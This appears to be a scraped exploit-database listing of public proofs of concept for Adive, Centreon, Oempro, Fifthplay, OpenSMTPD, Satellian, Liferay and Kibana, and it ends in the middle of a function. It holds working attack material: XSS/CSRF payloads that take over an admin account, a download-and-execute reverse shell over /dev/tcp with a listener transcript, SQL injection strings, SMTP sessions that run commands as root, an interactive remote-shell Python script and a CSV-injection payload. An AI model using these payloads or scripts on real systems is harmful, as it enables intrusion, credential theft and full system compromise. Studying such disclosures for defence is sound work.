macOS / iOS ImageIO Heap Corruption
Adive Framework 2.0.8 Cross Site Request Forgery
Adive Framework version 2.0.8 suffers from a cross site request forgery vulnerability.
# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)
# Exploit Author: Sarthak Saini
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# CVE:CVE-2020-7991
# Category: Webapps
# Tested on: Windows 64-bit / Mozilla Firefox
#
#
|--!>
|----------------------------------------------------------------------------------
1) Persistent Cross-site Scripting at user add page
Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting
Payload:- <script>alert(1)</script>
POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1
userName=test&userUsername=<script>alert('xss')</script>&pass=test&cpass=test&permission=3
|----------------------------------------------------------------------------------
2) Account takeover - cross-site request forgery (Change Admin Password)
Description : An attacker can craft malicious JavaScript and attach it to the stored XSS; when the admin visits the /admin/user page the payload triggers.
-> Save the payload as exp.js
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute()
{
var nuri ="http://192.168.2.5/admin/config";
xhttp = new XMLHttpRequest();
xhttp.open("POST", nuri, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.withCredentials = "true";
var body = "";
body += "\r\n\r\n";
body +=
"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
xhttp.send(body);
return true;
}
execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
-> Start a server and host the exp.js. Send the exp.js file in the xss payload
Payload:- <script src="http://192.168.2.5/exp.js"></script>
POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1
userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3
-> As soon as the admin visits the page the payload is triggered and the admin password is changed to hacked@123
|-----------------------------------------EOF-----------------------------------------
Centreon 19.10.5 Credential Disclosure
Centreon version 19.10.5 suffers from a database credential disclosure vulnerability.
# Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Database Credentials Disclosure
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
###########################################################################################################
POC:
- Configuration / Pollers / Broker configuration
-- Central-broker | Central-broker-master
--- Output
It is possible to discover the unencrypted password with the inspector.
DB user centreon
DB password ********
<input size="120" name="output[0][db_password]" type="password" value="ZVy892xx">
Centreon 19.10.5 Remote Command Execution
Centreon version 19.10.5 suffers from a remote command execution vulnerability.
# Exploit Title: Centreon 19.10.5 - Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Fabien AUNAY, Omri BASO
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -
###########################################################################################################
Centreon 19.10.5 Remote Command Execution Resources
Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.
It is possible to call binaries outside the default $USER$ path by adding Poller Resources.
By adding two entries it is possible to trigger a download-and-exec reverse shell.
Note: the reverse shell is persistent because Centreon executes the payloads every 10 minutes by default.
Steps:
Objective 1 : Add Download Resource
Objective 2 : Add Exec Resource
Objective 3 : Create both check commands
Objective 4 : Create your services and link them with a host
Restart the Central.
###########################################################################################################
# Objective 1 : Add Download Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
- Information:
Read the Centreon documentation:
To install Centreon software from the repository, you should first install the centreon-release package,
which provides the repository file. Some systems may not have the wget package installed.
If not, run the following : yum install wget
Solution 1: Remove restriction in Configuration/Pollers/Engine configuration
Solution 2: Modify input size inspector in client side <input> size="250"
Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh
# Objective 2 : Add Exec Resource
- Configuration/Pollers/Resources
- Problem:
Illegal Object Name Characters : ~!$%^&*"|'<>?,()=
Illegal Macro Output Characters : `~$^&"|'<>
Maximum client side input size limit: 35
Solution: Use a custom payload -> bash /tmp/x.sh
# Objective 3 : Create both check commands using your resources $xxx$ without arguments
# Objective 4 : Create your services and link them with a host
POC:
Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 -
nc -lvnp 1234
Ncat: Version 7.50
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:43128.
id
uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
sudo -l
Matching Defaults entries for centreon-engine on centreon-lab:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty
User centreon-engine may run the following commands on centreon-lab:
(root) NOPASSWD: /sbin/service centreontrapd start
(root) NOPASSWD: /sbin/service centreontrapd stop
(root) NOPASSWD: /sbin/service centreontrapd restart
(root) NOPASSWD: /sbin/service centreontrapd reload
(root) NOPASSWD: /usr/sbin/service centreontrapd start
(root) NOPASSWD: /usr/sbin/service centreontrapd stop
(root) NOPASSWD: /usr/sbin/service centreontrapd restart
(root) NOPASSWD: /usr/sbin/service centreontrapd reload
(root) NOPASSWD: /sbin/service centengine start
(root) NOPASSWD: /sbin/service centengine stop
(root) NOPASSWD: /sbin/service centengine restart
(root) NOPASSWD: /sbin/service centengine reload
(root) NOPASSWD: /usr/sbin/service centengine start
(root) NOPASSWD: /usr/sbin/service centengine stop
(root) NOPASSWD: /usr/sbin/service centengine restart
(root) NOPASSWD: /usr/sbin/service centengine reload
(root) NOPASSWD: /bin/systemctl start centengine
(root) NOPASSWD: /bin/systemctl stop centengine
(root) NOPASSWD: /bin/systemctl restart centengine
(root) NOPASSWD: /bin/systemctl reload centengine
(root) NOPASSWD: /usr/bin/systemctl start centengine
(root) NOPASSWD: /usr/bin/systemctl stop centengine
(root) NOPASSWD: /usr/bin/systemctl restart centengine
(root) NOPASSWD: /usr/bin/systemctl reload centengine
(root) NOPASSWD: /sbin/service cbd start
(root) NOPASSWD: /sbin/service cbd stop
(root) NOPASSWD: /sbin/service cbd restart
(root) NOPASSWD: /sbin/service cbd reload
(root) NOPASSWD: /usr/sbin/service cbd start
(root) NOPASSWD: /usr/sbin/service cbd stop
(root) NOPASSWD: /usr/sbin/service cbd restart
(root) NOPASSWD: /usr/sbin/service cbd reload
(root) NOPASSWD: /bin/systemctl start cbd
(root) NOPASSWD: /bin/systemctl stop cbd
(root) NOPASSWD: /bin/systemctl restart cbd
(root) NOPASSWD: /bin/systemctl reload cbd
(root) NOPASSWD: /usr/bin/systemctl start cbd
(root) NOPASSWD: /usr/bin/systemctl stop cbd
(root) NOPASSWD: /usr/bin/systemctl restart cbd
(root) NOPASSWD: /usr/bin/systemctl reload cbd
Octeth Oempro 4.8 SQL Injection
Octeth Oempro version 4.8 suffers from a remote SQL injection vulnerability.
# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740
An authenticated user can easily exploit this vulnerability. Octeth Oempro
4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get
is vulnerable.
# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019'&responseformat=JSON
# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON
Fifthplay S.A.M.I Cross Site Request Forgery / Cross Site Scripting
Fifthplay S.A.M.I suffers from cross site request forgery and persistent cross site scripting vulnerabilities.
Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS
Vendor: Fifthplay NV
Product web page: https://www.fifthplay.com
Affected version: Platform: HAM V1.2, HAM V1.1, HAM V1.0, DINHAM 10W
Image Version: 2019.3-20190605144803, 2019.2_HP-20190808154634, 2018.4_HP-20181015152950, 2018.2-20180516100815, 2017.2_HP-20180213083050, 2013.4_HP-201309301203
AMP Version: 2019.2_HP, 2018.4_HP, 2017.2_HP, 2013.4_HP, R20.19.03, R20.18.02
Fix: 2017.2-HP4, 2018.4_HP3, 2018.5_HP7, 2019.2_HP3, 2019.3_HP1
Summary: Fifthplay is a Belgian high-tech player and a subsidiary of Niko Group.
We have specialised in enriching smart homes and buildings for almost 10 years, and in
services that provide comfort and energy. Our gateway provides a modular approach
to integrating old and new technologies, such as smart meters, optical meters,
sockets and switches. Fifthplay is a trendsetter with regard to smart homes and buildings
and one of the sector's most innovative companies.
Desc: The application suffers from an unauthenticated stored XSS through POST request.
The issue is triggered when input passed via several parameters is not properly
sanitized before being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in context of an affected site. The
application interface also allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited
to perform certain actions if a user visits a malicious web site.
Tested on: lighttpd/1.4.33, PHP/5.4.33, PHP/5.3.19
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5561
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5561.php
29.09.2019
--
Stored XSS:
-----------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value='"><script>prompt(251)</script>' />
<input type="hidden" name="port" value='"><script>prompt(252)</script>' />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value='"><script>prompt(253)</script>' />
<input type="hidden" name="pass" value='"><script>prompt(254)</script>' />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Set proxy CSRF:
---------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="submit" value="Change" />
<input type="submit" value="Write" />
</form>
</body>
</html>
Delete proxy CSRF:
------------------
<html>
<body>
<form action="http://192.168.11.1/?page=networksettings" method="POST">
<input type="hidden" name="server" value="proxy.segfault.mk" />
<input type="hidden" name="port" value="8080" />
<input type="hidden" name="auth" value="1" />
<input type="hidden" name="user" value="testuser" />
<input type="hidden" name="pass" value="testpass" />
<input type="hidden" name="delete" value="Delete" />
<input type="submit" value="Clear" />
</form>
</body>
</html>
OpenBSD OpenSMTPD Privilege Escalation / Code Execution
Qualys discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This vulnerability is exploitable since May 2018 (commit a8e222352f, "switch smtpd to new grammar") and allows an attacker to execute arbitrary shell commands, as root.
Qualys Security Advisory
LPE and RCE in OpenSMTPD (CVE-2020-7247)
==============================================================================
Contents
==============================================================================
Summary
Analysis
Exploitation
Acknowledgments
==============================================================================
Summary
==============================================================================
We discovered a vulnerability in OpenSMTPD, OpenBSD's mail server. This
vulnerability is exploitable since May 2018 (commit a8e222352f, "switch
smtpd to new grammar") and allows an attacker to execute arbitrary shell
commands, as root:
- either locally, in OpenSMTPD's default configuration (which listens on
the loopback interface and only accepts mail from localhost);
- or locally and remotely, in OpenSMTPD's "uncommented" default
configuration (which listens on all interfaces and accepts external
mail).
We developed a simple proof of concept and successfully tested it
against OpenBSD 6.6 (the current release) and Debian testing (Bullseye);
other versions and distributions may be exploitable.
==============================================================================
Analysis
==============================================================================
OpenSMTPD's smtp_mailaddr() function is responsible for validating
sender (MAIL FROM) and recipient (RCPT TO) mail addresses:
------------------------------------------------------------------------------
2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191 const char *domain)
2192 {
....
2218 if (!valid_localpart(maddr->user) ||
2219 !valid_domainpart(maddr->domain)) {
....
2234 return (0);
2235 }
2236
2237 return (1);
2238 }
------------------------------------------------------------------------------
- it calls valid_domainpart() to validate the domain name (after the @
sign) of a mail address -- this function only accepts IPv4 and IPv6
addresses, and alpha-numeric, '.', '-', and '_' characters;
- it calls valid_localpart() to validate the local part (before the @
sign) of a mail address -- this function only accepts alpha-numeric,
'.', and MAILADDR_ALLOWED characters (a white list from RFC 5322):
71 #define MAILADDR_ALLOWED "!#$%&'*/?^`{|}~+-=_"
Among the characters in MAILADDR_ALLOWED, the ones that are also in
MAILADDR_ESCAPE are later transformed into ':' characters (escaped) by
mda_expand_token():
72 #define MAILADDR_ESCAPE "!#$%&'*?`{|}~"
smtp_mailaddr()'s white-listing and mda_expand_token()'s escaping are
fundamental to OpenSMTPD's security -- they prevent dangerous characters
from reaching the shell that executes MDA commands (in mda_unpriv()):
execle("/bin/sh", "/bin/sh", "-c", mda_command, (char *)NULL,
mda_environ);
Mail Delivery Agents (MDAs) are responsible for delivering mail to local
recipients; for example, OpenSMTPD's default MDA method is "mbox", and
the corresponding MDA command is (in parse.y):
asprintf(&dispatcher->u.local.command,
"/usr/libexec/mail.local -f %%{mbox.from} %%{user.username}");
where %{user.username} is the name of an existing local user (the local
part of the recipient address), and %{mbox.from} is the sender address
(which would be under the complete control of an attacker if it were not
for smtp_mailaddr()'s white-listing and mda_expand_token()'s escaping).
Unfortunately, we discovered a vulnerability in smtp_mailaddr()
(CVE-2020-7247):
------------------------------------------------------------------------------
2189 static int
2190 smtp_mailaddr(struct mailaddr *maddr, char *line, int mailfrom, char **args,
2191 const char *domain)
2192 {
....
2218 if (!valid_localpart(maddr->user) ||
2219 !valid_domainpart(maddr->domain)) {
....
2229 if (maddr->domain[0] == '\0') {
2230 (void)strlcpy(maddr->domain, domain,
2231 sizeof(maddr->domain));
2232 return (1);
2233 }
2234 return (0);
2235 }
2236
2237 return (1);
2238 }
------------------------------------------------------------------------------
If the local part of an address is invalid (line 2218) and if its domain
name is empty (line 2229), then smtp_mailaddr() adds the default domain
automatically (line 2230) and returns 1 (line 2232), although it should
return 0 because the local part of the address is invalid (for example,
because it contains invalid characters).
As a result, an attacker can pass dangerous characters that are not in
MAILADDR_ALLOWED and not in MAILADDR_ESCAPE (';' and ' ' in particular)
to the shell that executes the MDA command. For example, the following
local SMTP session executes "sleep 66" as root, in OpenSMTPD's default
configuration:
------------------------------------------------------------------------------
$ nc 127.0.0.1 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [127.0.0.1], pleased to meet you
MAIL FROM:<;sleep 66;>
250 2.0.0 Ok
RCPT TO:<root>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
How about a nice game of chess?
.
250 2.0.0 e6330998 Message accepted for delivery
QUIT
221 2.0.0 Bye
------------------------------------------------------------------------------
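The control-flow mistake described above, modelled as an added example (constructed for this write-up, not OpenSMTPD's source): the faulty function beside a corrected ordering, plus the ':' escaping step that mda_expand_token() applies. valid_domainpart() is simplified here to the plain character set; its IPv4/IPv6 literal handling is omitted.

```c
/* Added example, not OpenSMTPD code: a constructed model of the
 * smtp_mailaddr() logic from the advisory. Simplification (assumption):
 * valid_domainpart() checks only the plain character set. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAILADDR_ALLOWED "!#$%&'*/?^`{|}~+-=_"
#define MAILADDR_ESCAPE  "!#$%&'*?`{|}~"
#define LOCALPART_MAX 64   /* limit quoted in the Exploitation section */
#define DOMAIN_MAX   255

struct mailaddr {
    char user[LOCALPART_MAX + 1];
    char domain[DOMAIN_MAX + 1];
};

/* Local part: alphanumerics, '.', and the RFC 5322 white list only. */
static int valid_localpart(const char *s)
{
    if (*s == '\0' || strlen(s) > LOCALPART_MAX)
        return 0;
    for (; *s != '\0'; s++)
        if (!isalnum((unsigned char)*s) && *s != '.' &&
            strchr(MAILADDR_ALLOWED, *s) == NULL)
            return 0;
    return 1;
}

/* Domain part: alphanumerics, '.', '-', '_'; an empty domain is invalid. */
static int valid_domainpart(const char *s)
{
    if (*s == '\0')
        return 0;
    for (; *s != '\0'; s++)
        if (!isalnum((unsigned char)*s) && strchr("._-", *s) == NULL)
            return 0;
    return 1;
}

/* Faulty ordering (lines 2218-2232 of the listing): an empty domain is
 * "repaired" and the address accepted even though the local part failed. */
int smtp_mailaddr_vulnerable(struct mailaddr *m, const char *default_domain)
{
    if (!valid_localpart(m->user) || !valid_domainpart(m->domain)) {
        if (m->domain[0] == '\0') {
            snprintf(m->domain, sizeof m->domain, "%s", default_domain);
            return 1;   /* BUG: user was never confirmed valid */
        }
        return 0;
    }
    return 1;
}

/* Corrected ordering: fill in the default domain first, then require
 * BOTH parts to pass, so an invalid local part can no longer slip through. */
int smtp_mailaddr_fixed(struct mailaddr *m, const char *default_domain)
{
    if (m->domain[0] == '\0')
        snprintf(m->domain, sizeof m->domain, "%s", default_domain);
    return valid_localpart(m->user) && valid_domainpart(m->domain);
}

/* Escaping modelled on mda_expand_token(): white-listed but shell-significant
 * characters become ':' before the address reaches the MDA command line.
 * Note that ';' and ' ' are untouched, which is why the white list matters. */
void mda_escape(const char *in, char *out, size_t outsz)
{
    size_t i;
    for (i = 0; in[i] != '\0' && i + 1 < outsz; i++)
        out[i] = strchr(MAILADDR_ESCAPE, in[i]) != NULL ? ':' : in[i];
    out[i] = '\0';
}

/* Plain-string wrappers; "example.org" is the constructed default domain. */
static int run(const char *user, const char *domain,
               int (*fn)(struct mailaddr *, const char *))
{
    struct mailaddr m;
    snprintf(m.user, sizeof m.user, "%s", user);
    snprintf(m.domain, sizeof m.domain, "%s", domain);
    return fn(&m, "example.org");
}
int accept_vulnerable(const char *u, const char *d) { return run(u, d, smtp_mailaddr_vulnerable); }
int accept_fixed(const char *u, const char *d)      { return run(u, d, smtp_mailaddr_fixed); }
int escapes_to(const char *in, const char *expected)
{
    char buf[128];
    mda_escape(in, buf, sizeof buf);
    return strcmp(buf, expected) == 0;
}

int main(void)
{
    printf("vulnerable accepts <;sleep 66;>: %d\n", accept_vulnerable(";sleep 66;", ""));
    printf("fixed      accepts <;sleep 66;>: %d\n", accept_fixed(";sleep 66;", ""));
    printf("fixed      accepts <root>:       %d\n", accept_fixed("root", ""));
    return 0;
}
```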
==============================================================================
Exploitation
==============================================================================
Nevertheless, our ability to execute arbitrary shell commands through
the local part of the sender address is rather limited:
- although OpenSMTPD is less restrictive than RFC 5321, the maximum
length of a local part should be 64 characters;
- the characters in MAILADDR_ESCAPE (for example, '$' and '|') are
transformed into ':' characters.
To overcome these limitations, we drew inspiration from the Morris worm
(https://spaf.cerias.purdue.edu/tech-reps/823.pdf), which exploited the
DEBUG vulnerability in Sendmail by executing the body of a mail as a
shell script:
------------------------------------------------------------------------------
debug
mail from: </dev/null>
rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
data
cd /usr/tmp
cat > x14481910.c <<'EOF'
[text of vector program]
EOF
cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;
rm -f x14481910 x14481910.c
.
quit
------------------------------------------------------------------------------
Indeed, the standard input of an MDA command is the mail itself: "sed"
removes the headers (which were added automatically by the mail server)
and "/bin/sh" executes the body.
We cannot simply reuse this command (because we cannot use the '|' and
'>' characters), but we can use "read" to remove N header lines (where N
is greater than the number of header lines added by the mail server) and
prepend a "NOP slide" of N comment lines to the body of our mail. For
example, the following remote SMTP session executes the body of our
mail, as root, in OpenSMTPD's "uncommented" default configuration:
------------------------------------------------------------------------------
$ nc 192.168.56.143 25
220 obsd66.example.org ESMTP OpenSMTPD
HELO professor.falken
250 obsd66.example.org Hello professor.falken [192.168.56.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<root@example.org>
250 2.1.5 Destination address valid: Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
for i in W O P R; do
echo -n "($i) "&& id || break
done >> /root/x."`id -u`"."$$"
.
250 2.0.0 4cdd24df Message accepted for delivery
QUIT
221 2.0.0 Bye
------------------------------------------------------------------------------
==============================================================================
Acknowledgments
==============================================================================
We thank the OpenBSD developers for their great work and their quick
response.
Satellian 1.12 Remote Code Execution
Satellian version 1.1.2 suffers from a remote code execution vulnerability.
# Exploit Title: Satellian 1.12 - Remote Code Execution
# Date: 2020-01-28
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980
# Github repository: https://github.com/Xh4H/Satellian-CVE-2020-7980
# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||
# Performing initial scan. Listing available system binaries.
# Starting request to http://<redacted>
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...
# Satellian $ id
# uid=0(root) gid=0(root)
import requests
import argparse
import sys
import calendar
import time
from termcolor import colored
def cprint(text, color): # colored print
sys.stdout.write(colored(text + "\n", color, attrs=["bold"]))
def httpize(url):
if not url.startswith("http"):
cprint("Missing protocol, using http . . .", "yellow")
url = "http://" + url
return url
def send_command(url, command, verbose):
RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}}
string_to_split = '''"SUCCESS_"
},'''
if verbose:
cprint("Starting request to %s" % url, "yellow")
cprint("Executing command %s" % command, "yellow")
a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})
command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')
if len(command_output) < 4 and verbose:
cprint("Target doesn't seem to be vulnerable\nExiting.", 'red')
sys.exit()
print command_output
cprint("""
________________________________________
(__) / \\
(oo) ( Intellian Satellite Terminal PoC )
/-------\\/ --' \\________________________________________/
/ | ||
* ||----||
""", "green")
parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980")
parser.add_argument("-u", "--url", help="Base url")
args = parser.parse_args()
if args.url is None:
cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red")
sys.exit()
url = httpize(args.url)
def main():
cprint("Performing initial scan. Listing available system binaries.", "green")
send_command(url, '/bin/ls /bin', True)
while True:
command = raw_input('Satellian $ ')
send_command(url, command, False)
if __name__ == '__main__':
try:
main()
except Exception as e:
print e
print "\nAn error happened."
Liferay CE Portal 6.0.2 Remote Command Execution
Liferay CE Portal version 6.0.2 remote command execution exploit.
# Exploit Title: Liferay CE Portal 6.0.2 - Remote Command Execution
# Google Dork: N/A
# Date: 2020-01-29
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://sourceforge.net/projects/lportal/files/Liferay%20Portal/6.0.2/
# https://github.com/chakadev/Liferay-CE-Portal-Java-Deserialization
# Version: 6.0.2
# Tested on: MacOS
# CVE : N/A
#PoC
I already shared the payloads in my GitHub repo (because the payloads are very small and
contain a meta character). You must find the right syntax by a brute-force
method. The payloads I share are for a time-based proof of concept (sleep 10). The
application may not always output the command; that's why you should try the
time-based payload while doing the PoC.
POST /api/liferay HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
PAYLOADS HERE
Kibana 6.6.1 CSV Injection
Kibana version 6.6.1 suffers from a CSV injection vulnerability.
# Exploit Title: Kibana 6.6.1 - CSV Injection
# Google Dork: inurl:"/app/kibana" intitle:"Kibana"
# Date: 2020-01-15
# Exploit Author: Aamir Rehman
# Vendor Homepage: https://www.elastic.co/kibana
# Software Link: https://www.elastic.co/downloads/
# Version: v6.6.1 possibly latest versions
# Tested on: Kibana 6.6.1 - Firefox/Windows
# References:
# https://the-it-wonders.blogspot.com/2020/01/csv-injection-in-kibana-661-possibly.html
# https://github.com/elastic/kibana/issues/56081
# Software description:
Kibana is an open source data visualization dashboard for Elasticsearch. It provides visualization capabilities on top of the content indexed on an Elasticsearch cluster. Users can create bar, line and scatter plots, or pie charts and maps on top of large volumes of data.
# Technical Details & Impact:
Most Kibana deployments have authentication disabled, so any malicious user can inject a CSV payload in the visualization section of a dashboard, and it is possible to run a malicious command on the computer of the user who opens the exported file. Even though an alert message is shown when the file is opened, users usually ignore such pop-ups since the file comes from a known source.
# POC
1. Click on the Dashboard tab and select any dashboard from the list. I would suggest selecting a dashboard which has a Gauge or Line visualization type.
2. Once you are on the dashboard, click on the "Edit" button at the top right of the page.
3. Click the "gear (options)" button of any graphical view box.
4. This opens an options box; click on "edit visualization".
5. This opens the edit page; click on any "blue play button" in front of any metric.
6. Here you can edit the metric's information; we will be exploiting the "Custom Label" field.
7. In the Custom Label field enter your CSV injection payload, e.g. @SUM(1+1)*cmd|' /c calc'!A0.
8. All is done; now click on the top "blue play button" to save the settings and click on the SAVE button at the top right of the page.
9. Go back to the dashboard graphical view; you will see your CSV payload there. Click on the 3-dots button on top of the graphical box and click on "INSPECT".
10. This opens the export panel; click on download CSV and click formatted CSV.
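The export-side mitigation for the behaviour above, as an added example that is neither part of the advisory nor Kibana's code: a neutraliser for CSV cells that prefixes formula triggers with an apostrophe and quotes the value. The exemption for plain numbers (so "-12.5" survives unchanged) is an assumption of this example.

```c
/* Added example, not Kibana code: neutralise formula-triggering cells
 * before writing them to a CSV export. A cell is dangerous when, after
 * leading spaces, it starts with a character spreadsheet applications
 * treat as a formula trigger and it is not simply a number (assumption). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int looks_numeric(const char *s)
{
    char *end;
    if (*s == '\0')
        return 0;
    strtod(s, &end);
    return *end == '\0';
}

/* Returns 1 if a spreadsheet would evaluate this cell rather than display it. */
int csv_cell_is_dangerous(const char *cell)
{
    while (*cell == ' ')
        cell++;
    if (*cell == '\0' || strchr("=+-@\t\r", *cell) == NULL)
        return 0;
    return !looks_numeric(cell);
}

/* Writes a CSV-quoted copy of cell into out: a dangerous cell gets a leading
 * apostrophe (rendered as text, never evaluated), embedded quotes are doubled,
 * and the whole value is wrapped in double quotes so commas, newlines and the
 * apostrophe cannot break the record. Returns bytes written, 0 if out is too small. */
size_t csv_neutralize(const char *cell, char *out, size_t outsz)
{
    size_t n = 0;
    const char *p;
    /* worst case: two quotes + apostrophe + every char doubled + NUL */
    if (outsz < 2 * strlen(cell) + 4)
        return 0;
    out[n++] = '"';
    if (csv_cell_is_dangerous(cell))
        out[n++] = '\'';
    for (p = cell; *p != '\0'; p++) {
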